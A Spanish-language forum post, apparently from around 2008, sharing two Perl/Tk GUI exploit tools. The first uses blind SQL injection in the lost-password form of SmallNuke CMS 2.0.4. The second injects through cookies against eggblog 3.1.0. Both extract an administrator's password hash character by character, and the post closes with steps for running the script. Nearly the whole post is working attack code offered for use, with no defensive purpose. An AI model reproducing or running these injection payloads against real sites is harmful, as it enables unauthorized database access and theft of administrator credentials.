Ola aquy dejo mis Programas que una persona creo y subio a milworm pero le e modificado al 80% asi que es mas mio que el
Bueno mio tampoco por eso dejo el codijo y El Programa
Codijo de el Programa :SmallNukecms2.
0.4
#!/usr/bin/perl
use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;
$mw = new MainWindow(title => "Smallnuke cms 2.0.4 By Aima" );
$mw->geometry ( '420x380' ) ;
$mw->resizable(0,0);
$mw->Label(-text => '', -font => '{Verdana} 8',-foreground=>'red')->pack();
$mw->Label(-text => 'Smallnuke cms <= 2.0.4 Pass Recovery Sql Injection', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => 'it will take about half an hour to get hashed password', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => 'you need magic_quotes_gpc turned off and mysql version higher that 4.1 ', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => 'Creative GoogleHack.es creador de este programa aima', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => '¡Atencion este programa es de codijo libre no lo vendais!', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => '', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$fleft = $mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright = $mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
$url = 'http://laweb2.es/smallnuke/';
$user_id = 'Administrador';
$prefix = 'sn_';
$table = 'users';
$email = 'aima@gmail.com';
$column = 'user_password';
$report = '';
$group = 1;
$curr_user = 0;
$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'Your email: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$email) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'Returned data: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fright->Label( -text => ' ')->pack();
$fright->Button(-text => 'Test site vulnerability',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&test_vuln
)->pack();
$fright->Button(-text => 'Get hash from database',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_hash
)->pack();
$mw ->Label(-text => '', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => '!', -font => '{Webdings} 22')->pack();
$fleft->Label(-text => 'Programa Creado Para Cascanolahack.net', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'pass recovery sql injection por aima ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'mysql char bruteforcing ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'bug in insert function ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'by aima y googlehack.es ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'No modifiquen el codijo ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => '2008.02.08 ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fright->Label(-text => '', -font => '{Verdana} 3 bold',-foreground=>'red')->pack();
$print=$fright->Text(-width=>35,-height=>7,-wrap=>"word")->pack(-side=>"top",-anchor=>"s");
MainLoop();
sub get_hash()
{
$xpl = LWP::UserAgent->new( ) or die;
$InfoWindow=$mw->DialogBox(-title => 'get hash from database', -buttons => ["OK"]);
$i = 1;
$b = 0;
$report = '';
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$print->insert('end',"- Start [$hour:$min:$sec]\n");
my @brutearray=qw(48 49 50 51 52 53 54 55 56 57 58 97 98 99 100 101 102);
while (length($report)<32)
{
$num = $brutearray[$b];
$ret = get_pchar($i);
if($ret > 0)
{
$print->insert('end',"- char [$i] = ".chr($num)."\n");
$report .= chr($num);
$b = 0;
$i = $i +1;
$mw->update();
break;
}
else
{
$b = $b +1;
}
}
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$print->insert('end',"- Finish [$hour:$min:$sec]");
}
sub get_pchar($i)
{
$res = $xpl->post($url."index.php?go=Members",['in'=>'lost_pass','enter'=>'1','user_email'=>"$email' or ascii(substring((select password from ".$prefix."admins where admin_id=$user_id),$i,1))=$num/*"]);
if($res->as_string =~ /info=1/i ) { return 1;} else {return 0;}
}
sub test_vuln()
{
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->post($url."index.php?go=Members",['in'=>'lost_pass','enter'=>'1','username'=>"gema' and ascii(1)=49/*"]);
if($res->{_rc}==302)
{
$rep = '';
if($res->as_string =~ /info=1/i ) { $print->insert('end',"- FORUM VULNERABLE\n"); }
else { $print->insert('end',"- FORUM UNVULNERABLE\n");}
}
}
# Aima y GoogleHack.es [2008-01-08]
aquy dejo el segundo llamado
:Eggblog 3.1.0
jeje
el code:
#!/usr/bin/perl
use Tk;
use Tk::BrowseEntry;
use Tk::DialogBox;
use LWP::UserAgent;
$mw = new MainWindow(title => "Creado por aima --Eggblog 3.1.0 vulerability" );
$mw->geometry ( '420x343' ) ;
$mw->resizable(0,0);
$mw->Label(-text => '', -font => '{Verdana} 8',-foreground=>'red')->pack();
$mw->Label(-text => 'eggblog <= 3.1.0 Cookies Sql Injection', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => 'it will take about half an hour to get hashed password', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => 'you need magic_quotes_gpc turned off and mysql version higher that 4.1', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => 'Creado por aima ¡Cuidado es codijo libre!', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$mw->Label(-text => '', -font => '{Tahoma} 7 bold',-foreground=>'red')->pack();
$fleft = $mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ;
$fright = $mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ;
$url = 'http://test2.es/eggblog/home/index.php';
$user_id = 'Administrador';
$prefix = 'eggblog_';
$table = 'users';
$column = 'user_password';
$report = '';
$group = 1;
$curr_user = 0;
$fleft->Label ( -text => 'Path to forum index: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$url) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'User ID: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$user_id) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'Database tables prefix: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$prefix) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fleft->Label ( -text => 'Returned hash: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ;
$fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => \$report) ->pack ( -side => "top" , -anchor => 'w' ) ;
$fright->Label( -text => ' ')->pack();
$fright->Button(-text => 'Test blog vulnerability',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&test_vuln
)->pack();
$fright->Button(-text => 'Get hash from database',
-relief => "groove",
-width => '30',
-font => '{Verdana} 8 bold',
-activeforeground => 'red',
-command => \&get_hash
)->pack();
$mw ->Label(-text => '', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => '!', -font => '{Webdings} 22')->pack();
$fleft->Label(-text => 'eggblog 3.1.0', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'cookie sql injection ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'mysql char bruteforcing ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'bug in auth function ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => 'by aima ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => '( Creado por Aima ) ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fleft->Label(-text => ' 2007.02.04 ( fixed ) ', -font => '{Verdana} 7 bold',-foreground=>'red')->pack();
$fright->Label(-text => '', -font => '{Verdana} 3 bold',-foreground=>'red')->pack();
$print=$fright->Text(-width=>35,-height=>5,-wrap=>"word")->pack(-side=>"top",-anchor=>"s");
MainLoop();
sub get_hash()
{
srand();
$xpl = LWP::UserAgent->new( ) or die;
$InfoWindow=$mw->DialogBox(-title => 'get hash from database', -buttons => ["OK"]);
$i = 1;
$b = 0;
$report = '';
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$print->insert('end',"- Start [$hour:$min:$sec]\n");
my @brutearray=qw(48 49 50 51 52 53 54 55 56 57 58 97 98 99 100 101 102);
while (length($report)<32)
{
$num = $brutearray[$b];
$ret = get_pchar();
if($ret > 0)
{
$print->insert('end',"- char [$num] = ".chr($num)."\n");
$report .= chr($num);
$b = 0;
$i = $i +1;
$mw->update();
break;
}
else
{
$b = $b +1;
}
}
my ($sec,$min,$hour,$mday,$mon,$year,$wday,$yday,$isdst) = localtime(time);
$print->insert('end',"- Finish [$hour:$min:$sec]");
}
sub get_pchar()
{
$res = $xpl->get($url,'Cookie'=>"eggblogemail=%;eggblogpassword=' or 1=if(ascii(substring((select password from ".$prefix."members where id=$user_id),$i,1))=$num,1,(select 1 union select 2))/*");
if($res->as_string =~ /MySQL/i) { return 0;}
else {return 1;}
}
sub test_vuln()
{
$xpl = LWP::UserAgent->new( ) or die;
$res = $xpl->get($url,'Cookie'=>"eggblogemail=%;eggblogpassword='");
if($res->is_success)
{
$rep = '';
if($res->as_string =~ /MySQL/i)
{
$print->insert('end',"- BLOG VULNERABLE\n");
}
else { $print->insert('end',"- BLOG UNVULNERABLE\n");}
}
}
# milw0rm.com y GoogleHack.es [2008-01-07]
y como no tengo tiempo de subir los programas pues apañaros con lo que di es broma aquy dejo un manual
manual
Programas Libres Código En Perl By AIMA
1º pulsemos con el botón derecho del ratón y le damos a editar y pulsemos Archivo
2º después Guardar como lo tenemos que guardar en c:/perl/bin/ después lo guardamos con nombre exploit.pl.
3º vamos a inicio –ejecutar después escribimos CD..
4º otra vez CD..
5º escribimos CD perl
6º escribimos CD bin
7º escribimos perl exploit.pl
8º Se te ejecutara y listo.
Manual Creado Por AIMA y Googlehack.es Próximamente mas programas
Todos los derechos reservados a AIMA.
¡Peligro es Codigo libre!
Autor